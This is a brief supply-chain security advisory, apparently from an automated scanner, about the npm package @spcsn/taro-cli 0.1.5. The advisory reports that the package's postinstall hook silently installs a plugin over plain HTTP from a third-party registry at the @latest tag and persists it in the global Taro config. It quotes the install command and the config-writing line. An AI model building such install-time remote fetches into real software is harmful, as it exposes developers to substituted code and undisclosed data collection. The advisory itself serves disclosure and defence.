@spcsn/taro-cli @0.1.5

Summary

The package's postinstall script probes https://taro.jd.com/ and then invokes its own CLI to run npm install @jdtaro/plugin-build-report-performance@latest --registry http://registry.m.jd.com inside the user's global Taro config directory (~/.taro). The plugin is fetched over plain HTTP (no TLS) at the mutable @latest tag from a third-party registry (registry.m.jd.com), not from npmjs.org and not from the package's own publisher infrastructure. After install, the plugin name is appended to the global plugins list ( fs.writeJSONSync(configFilePath, { [configKey]: configItem }) ), so it is auto-loaded on every subsequent taro invocation. This is an unpinned, plain-HTTP, third-party code fetch executed at install time and persisted across future builds — an attacker able to MITM HTTP traffic to registry.m.jd.com (or the registry operator itself, given @latest ) can substitute arbitrary code that runs whenever the developer later runs Taro. The behavior is undocumented (README is empty) and silently enrolls every installer into a JD-operated build-reporting plugin without consent.

Source: amazon-inspector (10e2baba3a5166ecf1196146e1b2a8771836b25bd7f8d56979e3e277a3de9625)